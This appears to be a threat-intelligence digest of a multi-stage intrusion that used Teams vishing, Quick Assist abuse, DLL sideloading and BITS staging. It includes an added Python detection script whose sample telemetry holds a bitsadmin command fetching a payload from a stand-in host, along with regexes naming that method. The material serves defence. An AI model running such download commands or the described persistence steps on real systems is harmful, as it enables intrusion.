New Phishing Attack Combines Vishing and DLL Sideloading Techniques
Summary:
Ontinue’s Cyber Defence Centre investigated a complex, multi-stage attack involving social engineering, remote support abuse, and stealthy post-exploitation techniques. The intrusion began with a vishing campaign in which the threat actor impersonated IT support and delivered a malicious PowerShell payload via Microsoft Teams chat. This payload facilitated the initial compromise and was followed by the abuse of Microsoft Quick Assist to gain remote access. Once inside, the attacker deployed a signed binary and sideloaded a malicious DLL, which connected back to attacker-controlled infrastructure. Persistence was achieved by placing a shortcut in the Startup folder, and the actor leveraged Background Intelligent Transfer Service (BITS) jobs to stage additional payloads and maintain access over time. The second-stage payload included a JavaScript-based backdoor executed through a renamed Node.js binary, providing command-and-control via socket connections. The script connected to a C2 server using hardcoded credentials, including an embedded password, and reported a unique hardware ID for host tracking.
The adversary employed defense evasion through DLL sideloading, process hollowing, and termination of security-related processes. Discovery actions used WMI to gather system, network, and GPU details (potentially for VM detection). Lateral movement was attempted using PsExec, and credential theft was observed via access to browser-stored login data.
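The chain summarised above leaves several host-telemetry artefacts a defender can key on: a signed binary running under a name other than its PE OriginalFileName (the renamed Node.js binary), a script host spawned by a remote-support or messaging client, BITS transfers used for staging, and a new shortcut in the Startup folder. The following is an added detection example, not Ontinue's tooling or code from the write-up; the event field names, process image names and all sample paths are assumptions, and the rules generalise the page's single case to a small watchlist of signed binaries.

```python
import re
from pathlib import PureWindowsPath

# Signed binaries whose PE OriginalFileName should match the on-disk name; a
# mismatch flags a renamed copy (the renamed Node.js binary in the write-up).
WATCHED_ORIGINALS = {"node.exe", "psexec.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe"}
REMOTE_SUPPORT_PARENTS = {"ms-teams.exe", "quickassist.exe"}  # assumed image names
BITS_RE = re.compile(r"bitsadmin(\.exe)?\s+/transfer|start-bitstransfer", re.I)
STARTUP_LNK_RE = re.compile(r"\\start menu\\programs\\startup\\[^\\]+\.lnk$", re.I)

def base(path: str) -> str:
    return PureWindowsPath(path).name.lower()

def classify(event: dict) -> list[str]:
    # Names of every rule this event matches; empty list when it matches none.
    hits = []
    if event["type"] == "process":
        image, parent = base(event["image"]), base(event.get("parent_image", ""))
        orig = event.get("original_file_name", "").lower()
        if orig in WATCHED_ORIGINALS and orig != image:
            hits.append("renamed_signed_binary")
        if image in SCRIPT_HOSTS and parent in REMOTE_SUPPORT_PARENTS:
            hits.append("script_host_from_remote_support")
        if BITS_RE.search(event.get("command_line", "")):
            hits.append("bits_payload_staging")
    elif event["type"] == "file" and STARTUP_LNK_RE.search(event["target"]):
        hits.append("startup_folder_shortcut")
    return hits

def scan(events: list[dict]) -> dict[str, list[str]]:
    # Map each triggered rule to the ids of the events that fired it.
    findings: dict[str, list[str]] = {}
    for ev in events:
        for rule in classify(ev):
            findings.setdefault(rule, []).append(ev["id"])
    return findings

# Constructed sample telemetry; every path, name and URL here is made up.
SAMPLE_EVENTS = [
    {"id": "e1", "type": "process", "image": r"C:\Users\u\AppData\Local\svc\update.exe",
     "original_file_name": "node.exe", "parent_image": r"C:\Windows\explorer.exe"},
    {"id": "e2", "type": "process", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Program Files\WindowsApps\QuickAssist\QuickAssist.exe",
     "command_line": "powershell.exe -File support.ps1"},
    {"id": "e3", "type": "process", "image": r"C:\Windows\System32\bitsadmin.exe",
     "parent_image": r"C:\Windows\System32\cmd.exe", "command_line":
     r"bitsadmin.exe /transfer job /download http://example.invalid/p.bin C:\Users\Public\p.bin"},
    {"id": "e4", "type": "file",
     "target": r"C:\Users\u\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.lnk"},
    {"id": "e5", "type": "process", "image": r"C:\Program Files\nodejs\node.exe",  # benign: name intact
     "original_file_name": "node.exe", "parent_image": r"C:\Windows\System32\cmd.exe"},
]
```

Each rule alone is noisy in a real estate (administrators do use BITS and Startup shortcuts); the value is in several firing on the same host within a short window, which is how `scan` groups them.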
Security Officer Comments:
Notably, forensic analysis revealed advanced anti-analysis measures: debugger detection routines using IsDebuggerPresent, CPU feature checks, and sandbox evasion via vendor string and processor signature validation. Further stealth was achieved using inline hooking with custom hooking/unhooking logic resembling MinHook, enabling userland API redirection and memory unhooking to bypass endpoint defenses. Many of these tactics align with the threat actor Storm-1811, previously identified by Microsoft, which is known for exploiting Microsoft Teams, Quick Assist, and signed binaries for initial access and persistence. Although attribution cannot be confirmed with high confidence, the TTP overlap is significant.
Suggested Corrections:
Key defensive measures include:
- AI-powered tools for real-time environment visibility and alerting
- Monitoring messaging platforms for anomalous activities
- Securing remote access tools against unauthorized use
- Integrating machine-driven response systems for rapid mitigation
Link(s):
https://www.infosecurity-magazine.com/news/phishing-attack-combines-vishing/